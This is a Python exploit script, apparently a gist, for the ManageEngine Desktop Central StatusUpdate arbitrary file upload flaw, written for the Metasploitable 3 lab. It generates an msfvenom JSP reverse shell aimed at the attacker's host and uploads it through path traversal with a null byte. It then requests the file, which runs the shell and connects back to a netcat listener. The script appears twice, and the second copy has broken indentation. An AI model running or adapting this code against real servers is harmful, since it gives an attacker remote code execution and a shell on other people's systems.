joenorton8014/manage-engine-exploit.py

## manage-engine-exploit.py
#!/usr/bin/python
import requests
import os
import subprocess
import psutil
import time
import sys

# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
# Based off - https://www.exploit-db.com/exploits/34594/
# Meant for Metasploitable 3, hence the hardcoded msfvenom payload
# Create's shell.jsp file on the attacker, reads the content, POSTs that to the server
# and the subsequent GET executes the shell
# No error checking!

if len(sys.argv) < 4:
    print "\nUsage: " + sys.argv[0] + " <TARGET> + <TARGET_PORT> + <ATTACKER_IP> + <ATTACKER_PORT>\n"
    print "For example: ./manageengine-exploit.py 192.168.55.229 8022 10.0.0.35 5555\n"
    print "Make sure you're netcat listener is running on the attacker host before starting the exploit!\n"
    sys.exit()

target = sys.argv[1]
target_port = sys.argv[2]
attacker = sys.argv[3]
attacker_port = sys.argv[4]


# POST parameters:
post = '/fileupload?connectionId=p/../../../../../jspf/shell.jsp%00&resourceId=p&action=rds_file_upload&computerName=tKPalt&customerId=978478'
post_headers = {'Host': target + ':' + target_port,
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Content-Type': 'application/octet-stream',
'Content-Length': '148298'
}

# GET parameters:
get = '/jspf/shell.jsp'
get_headers = {'Host': target + ':' + target_port,
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
'Content-Type': 'application/x-www-form-urlencoded'
}


post_url = 'http://' + target + ':' + target_port + post
get_url = 'http://' + target + ':' + target_port + get
# Generate the shell.jsp file:
create_shell = 'msfvenom -p java/jsp_shell_reverse_tcp lhost=' + attacker + ' lport=' + attacker_port + ' -o shell.jsp'
print "Generating shell.jsp"
os.popen(create_shell)
time.sleep(10)
print "Shell generated, check your netcat listener!"
# Read the contents of the shell.jsp file and place them in payload_data variable:
with open('shell.jsp', 'r') as myfile:
    payload_data=myfile.read().replace('\n', '')

# POST the shell:
r = requests.post(post_url, data = payload_data)
# GET the shell:
r = requests.get(get_url, headers = get_headers)
	#!/usr/bin/python
	import requests
	import os
	import subprocess
	import psutil
	import time
	import sys

	# A quick and dirty exploit of ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
	# Based off - https://www.exploit-db.com/exploits/34594/
	# Meant for Metasploitable 3, hence the hardcoded msfvenom payload
	# Create's shell.jsp file on the attacker, reads the content, POSTs that to the server
	# and the subsequent GET executes the shell
	# No error checking!

	if len(sys.argv) < 4:
	print "\nUsage: " + sys.argv[0] + " <TARGET> + <TARGET_PORT> + <ATTACKER_IP> + <ATTACKER_PORT>\n"
	print "For example: ./manageengine-exploit.py 192.168.55.229 8022 10.0.0.35 5555\n"
	print "Make sure you're netcat listener is running on the attacker host before starting the exploit!\n"
	sys.exit()

	target = sys.argv[1]
	target_port = sys.argv[2]
	attacker = sys.argv[3]
	attacker_port = sys.argv[4]


	# POST parameters:
	post = '/fileupload?connectionId=p/../../../../../jspf/shell.jsp%00&resourceId=p&action=rds_file_upload&computerName=tKPalt&customerId=978478'
	post_headers = {'Host': target + ':' + target_port,
	'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
	'Content-Type': 'application/octet-stream',
	'Content-Length': '148298'
	}

	# GET parameters:
	get = '/jspf/shell.jsp'
	get_headers = {'Host': target + ':' + target_port,
	'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
	'Content-Type': 'application/x-www-form-urlencoded'
	}


	post_url = 'http://' + target + ':' + target_port + post
	get_url = 'http://' + target + ':' + target_port + get
	# Generate the shell.jsp file:
	create_shell = 'msfvenom -p java/jsp_shell_reverse_tcp lhost=' + attacker + ' lport=' + attacker_port + ' -o shell.jsp'
	print "Generating shell.jsp"
	os.popen(create_shell)
	time.sleep(10)
	print "Shell generated, check your netcat listener!"
	# Read the contents of the shell.jsp file and place them in payload_data variable:
	with open('shell.jsp', 'r') as myfile:
	payload_data=myfile.read().replace('\n', '')

	# POST the shell:
	r = requests.post(post_url, data = payload_data)
	# GET the shell:
	r = requests.get(get_url, headers = get_headers)